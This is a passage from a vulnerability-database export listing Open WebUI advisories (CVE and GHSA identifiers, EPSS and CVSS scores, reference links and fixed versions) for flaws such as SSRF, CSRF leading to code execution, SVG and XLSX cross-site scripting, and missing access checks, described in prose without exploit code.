scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-19T12:26:51Z/
url https://github.com/open-webui/open-webui/security/advisories/GHSA-v6qf-75pr-p96m
fixed_packages
0
url pkg:pypi/open-webui@0.8.11
purl pkg:pypi/open-webui@0.8.11
is_vulnerable true
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.8.11
aliases CVE-2026-45365, GHSA-v6qf-75pr-p96m
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-6rbm-rm25-hqgy
21
url VCID-7j5a-pu4k-kucf
vulnerability_id VCID-7j5a-pu4k-kucf
summary open-webui v0.6.33 is vulnerable to Incorrect Access Control. The API /api/tasks/stop/ directly accesses and cancels tasks without verifying user ownership, enabling an attacker with an ordinary user account to stop arbitrary LLM response tasks.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2025-63681
reference_id
reference_type
scores
0
value 0.00017
scoring_system epss
scoring_elements 0.04616
published_at 2026-06-12T12:55:00Z
1
value 0.00017
scoring_system epss
scoring_elements 0.04594
published_at 2026-06-14T12:55:00Z
2
value 0.00017
scoring_system epss
scoring_elements 0.04602
published_at 2026-06-13T12:55:00Z
3
value 0.00017
scoring_system epss
scoring_elements 0.04617
published_at 2026-06-11T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2025-63681
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 2.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P
1
value LOW
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://nvd.nist.gov/vuln/detail/CVE-2025-63681
reference_id CVE-2025-63681
reference_type
scores
0
value 2.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P
1
value LOW
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2025-63681
3
reference_url https://github.com/advisories/GHSA-frv8-gffc-37px
reference_id GHSA-frv8-gffc-37px
reference_type
scores
0
value LOW
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-frv8-gffc-37px
4
reference_url https://github.com/open-webui/open-webui/blob/46ae3f4f5d7d4d706041bdae4ad2d802e568712b/backend/open_webui/main.py#L1652
reference_id main.py#L1652
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
1
value 2.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P
2
value LOW
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-05T19:50:21Z/
url https://github.com/open-webui/open-webui/blob/46ae3f4f5d7d4d706041bdae4ad2d802e568712b/backend/open_webui/main.py#L1652
5
reference_url https://github.com/TOAST-Research/pocs/blob/main/openwebui/arbitirary_task_stop/report.md
reference_id report.md
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
1
value 2.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P
2
value LOW
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-05T19:50:21Z/
url https://github.com/TOAST-Research/pocs/blob/main/openwebui/arbitirary_task_stop/report.md
fixed_packages
0
url pkg:pypi/open-webui@0.6.34
purl pkg:pypi/open-webui@0.6.34
is_vulnerable true
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.6.34
aliases CVE-2025-63681, GHSA-frv8-gffc-37px
risk_score 1.9
exploitability 0.5
weighted_severity 3.9
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-7j5a-pu4k-kucf
22
url VCID-7nbc-ng1s-suck
vulnerability_id VCID-7nbc-ng1s-suck
summary Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to version 0.8.6, any authenticated user can read other users' private memories via `/api/v1/retrieval/query/collection`. Version 0.8.6 patches the issue.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-29071
reference_id
reference_type
scores
0
value 0.00013
scoring_system epss
scoring_elements 0.02293
published_at 2026-06-14T12:55:00Z
1
value 0.00013
scoring_system epss
scoring_elements 0.02291
published_at 2026-06-11T12:55:00Z
2
value 0.00013
scoring_system epss
scoring_elements 0.02286
published_at 2026-06-13T12:55:00Z
3
value 0.00013
scoring_system epss
scoring_elements 0.0229
published_at 2026-06-12T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-29071
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 3.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N
1
value LOW
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-29071
reference_id
reference_type
scores
0
value 3.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N
1
value LOW
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-29071
3
reference_url https://github.com/advisories/GHSA-w9f8-gxf9-rhvw
reference_id GHSA-w9f8-gxf9-rhvw
reference_type
scores
0
value LOW
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-w9f8-gxf9-rhvw
4
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-w9f8-gxf9-rhvw
reference_id GHSA-w9f8-gxf9-rhvw
reference_type
scores
0
value 3.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N
1
value LOW
scoring_system cvssv3.1_qr
scoring_elements
2
value LOW
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-27T20:06:23Z/
url https://github.com/open-webui/open-webui/security/advisories/GHSA-w9f8-gxf9-rhvw
fixed_packages
0
url pkg:pypi/open-webui@0.8.6
purl pkg:pypi/open-webui@0.8.6
is_vulnerable true
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.8.6
aliases CVE-2026-29071, GHSA-w9f8-gxf9-rhvw
risk_score 1.4
exploitability 0.5
weighted_severity 2.8
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-7nbc-ng1s-suck
23
url VCID-8n6u-wgz9-1bgj
vulnerability_id VCID-8n6u-wgz9-1bgj
summary Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to version 0.8.6, an unsanitized filename field in the speech-to-text transcription endpoint allows any authenticated non-admin user to trigger a `FileNotFoundError` whose message — including the server's absolute `DATA_DIR` path — is returned verbatim in the HTTP 400 response body, confirming information disclosure on all default deployments. Version 0.8.6 patches the issue.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-28786
reference_id
reference_type
scores
0
value 0.00037
scoring_system epss
scoring_elements 0.11325
published_at 2026-06-14T12:55:00Z
1
value 0.00037
scoring_system epss
scoring_elements 0.11302
published_at 2026-06-11T12:55:00Z
2
value 0.00037
scoring_system epss
scoring_elements 0.11358
published_at 2026-06-13T12:55:00Z
3
value 0.00037
scoring_system epss
scoring_elements 0.11371
published_at 2026-06-12T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-28786
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://github.com/open-webui/open-webui/commit/387225eb8b3906909436004f84fff1b012e067d4
reference_id
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui/commit/387225eb8b3906909436004f84fff1b012e067d4
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-28786
reference_id
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-28786
4
reference_url https://github.com/advisories/GHSA-vvxm-vxmr-624h
reference_id GHSA-vvxm-vxmr-624h
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-vvxm-vxmr-624h
5
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-vvxm-vxmr-624h
reference_id GHSA-vvxm-vxmr-624h
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-27T13:27:12Z/
url https://github.com/open-webui/open-webui/security/advisories/GHSA-vvxm-vxmr-624h
fixed_packages
0
url pkg:pypi/open-webui@0.8.6
purl pkg:pypi/open-webui@0.8.6
is_vulnerable true
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.8.6
aliases CVE-2026-28786, GHSA-vvxm-vxmr-624h
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-8n6u-wgz9-1bgj
24
url VCID-8nzh-cpda-dkca
vulnerability_id VCID-8nzh-cpda-dkca
summary Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.3, the POST /api/v1/notes/{id}/pin endpoint performs a write operation (toggling the is_pinned field) but only checks for read permission. Users with read-only access to a shared note can pin/unpin it, which is a state-modifying action that should require write permission. This vulnerability is fixed in 0.9.3.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-45316
reference_id
reference_type
scores
0
value 0.00011
scoring_system epss
scoring_elements 0.01488
published_at 2026-06-14T12:55:00Z
1
value 0.00011
scoring_system epss
scoring_elements 0.01471
published_at 2026-06-11T12:55:00Z
2
value 0.00011
scoring_system epss
scoring_elements 0.0148
published_at 2026-06-13T12:55:00Z
3
value 0.00011
scoring_system epss
scoring_elements 0.01474
published_at 2026-06-12T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-45316
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 3.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N
1
value LOW
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://github.com/open-webui/open-webui/releases/tag/v0.9.3
reference_id
reference_type
scores
0
value 3.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N
1
value LOW
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui/releases/tag/v0.9.3
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-45316
reference_id
reference_type
scores
0
value 3.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N
1
value LOW
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-45316
4
reference_url https://github.com/advisories/GHSA-jx2x-j75f-xq3j
reference_id GHSA-jx2x-j75f-xq3j
reference_type
scores
0
value LOW
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-jx2x-j75f-xq3j
5
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-jx2x-j75f-xq3j
reference_id GHSA-jx2x-j75f-xq3j
reference_type
scores
0
value 3.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N
1
value LOW
scoring_system cvssv3.1_qr
scoring_elements
2
value LOW
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-18T15:45:34Z/
url https://github.com/open-webui/open-webui/security/advisories/GHSA-jx2x-j75f-xq3j
fixed_packages
0
url pkg:pypi/open-webui@0.9.3
purl pkg:pypi/open-webui@0.9.3
is_vulnerable true
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.9.3
aliases CVE-2026-45316, GHSA-jx2x-j75f-xq3j
risk_score 1.6
exploitability 0.5
weighted_severity 3.1
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-8nzh-cpda-dkca
25
url VCID-8qvj-xndv-v3ay
vulnerability_id VCID-8qvj-xndv-v3ay
summary A vulnerability in open-webui/open-webui versions <= 0.3.8 allows remote code execution by non-admin users via Cross-Site Request Forgery (CSRF). The application uses cookies with the SameSite attribute set to lax for authentication and lacks CSRF tokens. This allows an attacker to craft a malicious HTML page that, when accessed by a victim, can modify the Python code of an existing pipeline and execute arbitrary code with the victim's privileges.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2024-7806
reference_id
reference_type
scores
0
value 0.00876
scoring_system epss
scoring_elements 0.75815
published_at 2026-06-13T12:55:00Z
1
value 0.00876
scoring_system epss
scoring_elements 0.7581
published_at 2026-06-14T12:55:00Z
2
value 0.00876
scoring_system epss
scoring_elements 0.75731
published_at 2026-06-11T12:55:00Z
3
value 0.00876
scoring_system epss
scoring_elements 0.75802
published_at 2026-06-12T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2024-7806
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 8.0
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://github.com/open-webui/open-webui/blob/1d20c27553f019477f01d7233ebe40b11d31e479/backend/main.py#L892-L920
reference_id
reference_type
scores
0
value 8.0
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui/blob/1d20c27553f019477f01d7233ebe40b11d31e479/backend/main.py#L892-L920
3
reference_url https://github.com/open-webui/open-webui/commit/7e253df17593bc12dc5cc89d28703675f05b0158
reference_id
reference_type
scores
0
value 8.0
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui/commit/7e253df17593bc12dc5cc89d28703675f05b0158
4
reference_url https://github.com/open-webui/open-webui/pull/6054
reference_id
reference_type
scores
0
value 8.0
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui/pull/6054
5
reference_url https://nvd.nist.gov/vuln/detail/CVE-2024-7806
reference_id
reference_type
scores
0
value 8.0
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2024-7806
6
reference_url https://huntr.com/bounties/9350a68d-5f33-4b3d-988b-81e778160ab8
reference_id 9350a68d-5f33-4b3d-988b-81e778160ab8
reference_type
scores
0
value 8
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H
1
value 8.0
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-03-20T15:21:31Z/
url https://huntr.com/bounties/9350a68d-5f33-4b3d-988b-81e778160ab8
7
reference_url https://github.com/advisories/GHSA-85jc-8h5p-8vw8
reference_id GHSA-85jc-8h5p-8vw8
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-85jc-8h5p-8vw8
fixed_packages
0
url pkg:pypi/open-webui@0.3.33
purl pkg:pypi/open-webui@0.3.33
is_vulnerable true
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.3.33
aliases CVE-2024-7806, GHSA-85jc-8h5p-8vw8
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-8qvj-xndv-v3ay
26
url VCID-8y4k-pj2n-8uhm
vulnerability_id VCID-8y4k-pj2n-8uhm
summary Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.3, the channel webhook create/update flow accepts arbitrary profile_image_url values, including data:image/svg+xml;base64,... payloads. The profile image endpoint then decodes and serves this SVG as image/svg+xml without sanitization, allowing attacker-controlled script handlers (for example onload) to execute when the profile-image URL is opened in the browser. This vulnerability is fixed in 0.9.3.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-45314
reference_id
reference_type
scores
0
value 0.0001
scoring_system epss
scoring_elements 0.01267
published_at 2026-06-13T12:55:00Z
1
value 0.0001
scoring_system epss
scoring_elements 0.01271
published_at 2026-06-14T12:55:00Z
2
value 0.0001
scoring_system epss
scoring_elements 0.01264
published_at 2026-06-11T12:55:00Z
3
value 0.0001
scoring_system epss
scoring_elements 0.0126
published_at 2026-06-12T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-45314
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value 7.4
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://github.com/open-webui/open-webui/releases/tag/v0.9.3
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value 7.4
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui/releases/tag/v0.9.3
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-45314
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value 7.4
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-45314
4
reference_url https://github.com/advisories/GHSA-3856-3vxq-m6fc
reference_id GHSA-3856-3vxq-m6fc
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-3856-3vxq-m6fc
5
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-3856-3vxq-m6fc
reference_id GHSA-3856-3vxq-m6fc
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value 7.4
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N
3
value HIGH
scoring_system generic_textual
scoring_elements
4
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-18T19:43:05Z/
url https://github.com/open-webui/open-webui/security/advisories/GHSA-3856-3vxq-m6fc
fixed_packages
0
url pkg:pypi/open-webui@0.9.3
purl pkg:pypi/open-webui@0.9.3
is_vulnerable true
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.9.3
aliases CVE-2026-45314, GHSA-3856-3vxq-m6fc
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-8y4k-pj2n-8uhm
27
url VCID-94nj-qkdf-xfhn
vulnerability_id VCID-94nj-qkdf-xfhn
summary Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.6.37, a Server-Side Request Forgery (SSRF) vulnerability in Open WebUI allows any authenticated user to force the server to make HTTP requests to arbitrary URLs. This can be exploited to access cloud metadata endpoints (AWS/GCP/Azure), scan internal networks, access internal services behind firewalls, and exfiltrate sensitive information. No special permissions beyond basic authentication are required. This vulnerability is fixed in 0.6.37.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2025-65958
reference_id
reference_type
scores
0
value 0.00053
scoring_system epss
scoring_elements 0.17244
published_at 2026-06-14T12:55:00Z
1
value 0.00053
scoring_system epss
scoring_elements 0.17271
published_at 2026-06-13T12:55:00Z
2
value 0.00053
scoring_system epss
scoring_elements 0.17254
published_at 2026-06-12T12:55:00Z
3
value 0.00053
scoring_system epss
scoring_elements 0.17094
published_at 2026-06-11T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2025-65958
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 8.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://github.com/open-webui/open-webui/commit/02238d3113e966c353fce18f1b65117380896774
reference_id 02238d3113e966c353fce18f1b65117380896774
reference_type
scores
0
value 8.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-08T20:54:23Z/
url https://github.com/open-webui/open-webui/commit/02238d3113e966c353fce18f1b65117380896774
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2025-65958
reference_id CVE-2025-65958
reference_type
scores
0
value 8.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2025-65958
4
reference_url https://github.com/advisories/GHSA-c6xv-rcvw-v685
reference_id GHSA-c6xv-rcvw-v685
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-c6xv-rcvw-v685
5
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-c6xv-rcvw-v685
reference_id GHSA-c6xv-rcvw-v685
reference_type
scores
0
value 8.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-08T20:54:23Z/
url https://github.com/open-webui/open-webui/security/advisories/GHSA-c6xv-rcvw-v685
fixed_packages
0
url pkg:pypi/open-webui@0.6.37
purl pkg:pypi/open-webui@0.6.37
is_vulnerable true
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.6.37
aliases CVE-2025-65958, GHSA-c6xv-rcvw-v685
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-94nj-qkdf-xfhn
28
url VCID-9jud-sr2a-8yc3
vulnerability_id VCID-9jud-sr2a-8yc3
summary Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.8.0, Excel file attachments are previewed in an unsafe way. A crafted XLSX file payload can be used to cause the sheetjs function sheet_to_html to embed an XSS payload into the generated HTML. This is subsequently added to the DOM unsanitized via @html causing the payload to trigger. This vulnerability is fixed in 0.8.0.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-44549
reference_id
reference_type
scores
0
value 0.00012
scoring_system epss
scoring_elements 0.01606
published_at 2026-06-14T12:55:00Z
1
value 0.00012
scoring_system epss
scoring_elements 0.01593
published_at 2026-06-11T12:55:00Z
2
value 0.00012
scoring_system epss
scoring_elements 0.01598
published_at 2026-06-13T12:55:00Z
3
value 0.00012
scoring_system epss
scoring_elements 0.01595
published_at 2026-06-12T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-44549
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-44549
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-44549
3
reference_url https://github.com/advisories/GHSA-jwf8-pv5p-vhmc
reference_id GHSA-jwf8-pv5p-vhmc
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-jwf8-pv5p-vhmc
4
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-jwf8-pv5p-vhmc
reference_id GHSA-jwf8-pv5p-vhmc
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-05-18T12:47:08Z/
url https://github.com/open-webui/open-webui/security/advisories/GHSA-jwf8-pv5p-vhmc
fixed_packages
0
url pkg:pypi/open-webui@0.8.0
purl pkg:pypi/open-webui@0.8.0
is_vulnerable true
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.8.0
aliases CVE-2026-44549, GHSA-jwf8-pv5p-vhmc
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-9jud-sr2a-8yc3
29
url VCID-9zyk-459z-x3a4
vulnerability_id VCID-9zyk-459z-x3a4
summary Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.5.7, a user can modify another user's model even if its visibility is set to Private. By changing the access permissions during editing, unauthorized access can be gained. This vulnerability is fixed in 0.5.7.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-45345
reference_id
reference_type
scores
0
value 0.0003
scoring_system epss
scoring_elements 0.09279
published_at 2026-06-12T12:55:00Z
1
value 0.0003
scoring_system epss
scoring_elements 0.09271
published_at 2026-06-14T12:55:00Z
2
value 0.0003
scoring_system epss
scoring_elements 0.09226
published_at 2026-06-11T12:55:00Z
3
value 0.0003
scoring_system epss
scoring_elements 0.09281
published_at 2026-06-13T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-45345
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-45345
reference_id
reference_type
